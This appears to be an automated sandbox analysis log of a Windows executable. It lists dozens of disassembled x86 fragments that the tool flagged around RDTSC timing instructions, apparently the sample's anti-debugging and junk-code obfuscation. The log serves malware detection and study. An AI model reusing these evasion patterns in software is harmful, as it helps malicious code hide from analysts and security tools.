Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7015F1 second address: 70167F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F7905006508h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a mov dword ptr [ebp+122D5546h], esi 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 sub di, E7A7h 0x0000003c mov eax, dword ptr [ebp+122D137Dh] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F7905006508h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c jne 00007F7905006508h 0x00000062 mov edi, dword ptr [ebp+122D289Bh] 0x00000068 push FFFFFFFFh 0x0000006a add bh, 00000042h 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F7905006514h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70167F second address: 701685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 701685 second address: 701689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 701689 second address: 701699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 701699 second address: 70169E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7027DA second address: 7027DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70169E second address: 7016A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7027DE second address: 7027F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F7905119FB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70482F second address: 704835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 704835 second address: 704839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 704839 second address: 704847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70585A second address: 70590B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F7905119FB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F7905119FC0h 0x00000014 stc 0x00000015 pop edi 0x00000016 mov ebx, edi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f jmp 00007F7905119FBDh 0x00000024 sub edi, dword ptr [ebp+1244335Ch] 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F7905119FB8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b jne 00007F7905119FBCh 0x00000051 mov eax, dword ptr [ebp+122D0AB1h] 0x00000057 push 00000000h 0x00000059 push eax 0x0000005a call 00007F7905119FB8h 0x0000005f pop eax 0x00000060 mov dword ptr [esp+04h], eax 0x00000064 add dword ptr [esp+04h], 0000001Bh 0x0000006c inc eax 0x0000006d push eax 0x0000006e ret 0x0000006f pop eax 0x00000070 ret 0x00000071 mov ebx, dword ptr [ebp+122D270Bh] 0x00000077 or bl, 00000027h 0x0000007a push FFFFFFFFh 0x0000007c adc edi, 63D76941h 0x00000082 nop 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70590B second address: 70590F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70590F second address: 705919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 705919 second address: 70591D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7099D9 second address: 7099F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F7905119FB6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F285 second address: 70F28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F28A second address: 70F28F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F28F second address: 70F295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F295 second address: 70F2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F7905119FB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F2A8 second address: 70F2B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F2B0 second address: 70F2B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F2B6 second address: 70F2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F790500650Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70F3E2 second address: 70F3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 ja 00007F7905119FB6h 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714D32 second address: 714D37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714D37 second address: 714D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F7905119FB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714D48 second address: 714D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714D5D second address: 714D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714D61 second address: 714D67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714D67 second address: 714D90 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7905119FCFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714D90 second address: 714D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7905006506h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 714FA7 second address: 714FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007F7905119FC8h 0x00000011 pushad 0x00000012 js 00007F7905119FB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71509A second address: 71509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71509F second address: 7150A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7905119FB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7150A9 second address: 7150BD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7905006506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7150BD second address: 7150C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7150C2 second address: 715101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jg 00007F790500650Eh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7905006517h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 715101 second address: 715111 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 715111 second address: 715116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 715116 second address: 715120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7905119FB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 719784 second address: 71978A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71978A second address: 719790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 719790 second address: 719794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 718E3C second address: 718E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 718E47 second address: 718E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 718FEF second address: 718FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71915E second address: 719162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 719162 second address: 719168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 719168 second address: 719191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F7905006520h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 719191 second address: 7191B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7905119FB6h 0x0000000a popad 0x0000000b jmp 00007F7905119FBBh 0x00000010 popad 0x00000011 ja 00007F7905119FDEh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 719386 second address: 71939D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006511h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7194D7 second address: 7194DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7194DD second address: 7194E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7194E3 second address: 7194EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7905119FB6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7194EF second address: 7194F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71F0E9 second address: 71F0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7905119FB6h 0x0000000a jo 00007F7905119FB6h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71F0FD second address: 71F103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71DFB4 second address: 71DFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71DFB8 second address: 71DFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7905006512h 0x0000000c jc 00007F7905006506h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E9CDD second address: 6E9CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EA2CF second address: 6EA333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F7905006511h 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F7905006508h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 adc edi, 596A5121h 0x0000002c or cl, FFFFFFE3h 0x0000002f push eax 0x00000030 pushad 0x00000031 jmp 00007F7905006516h 0x00000036 push eax 0x00000037 push edx 0x00000038 jng 00007F7905006506h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EA462 second address: 6EA4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F7905119FC1h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jns 00007F7905119FC8h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b js 00007F7905119FBEh 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EAC49 second address: 6EAC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EAC4D second address: 6EAC5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EAC5B second address: 6EAC88 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7905006513h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F7905006511h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EAC88 second address: 6EAC92 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7905119FBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EADE1 second address: 6EADE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EAF4A second address: 6D1C33 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7905119FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jng 00007F7905119FBBh 0x00000014 add dx, 74E3h 0x00000019 call dword ptr [ebp+12443D07h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jno 00007F7905119FB8h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6D1C33 second address: 6D1C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006519h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F790500650Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6D1C5E second address: 6D1C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71E3F5 second address: 71E3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7905006506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71E3FF second address: 71E403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71E403 second address: 71E413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F7905006506h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71E6D3 second address: 71E6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71E6D9 second address: 71E6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7905006516h 0x0000000a ja 00007F7905006506h 0x00000010 jmp 00007F790500650Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71EC6A second address: 71EC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007F7905119FE6h 0x0000000b jnl 00007F7905119FC2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7905119FBEh 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 71EC99 second address: 71EC9F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6AB69A second address: 6AB69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 72410F second address: 72412B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7905006510h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 72412B second address: 724135 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724135 second address: 724139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724139 second address: 72413F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7246B1 second address: 7246CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905006517h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7246CD second address: 7246D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724843 second address: 724847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724B03 second address: 724B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7905119FB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724B0F second address: 724B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724C91 second address: 724C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
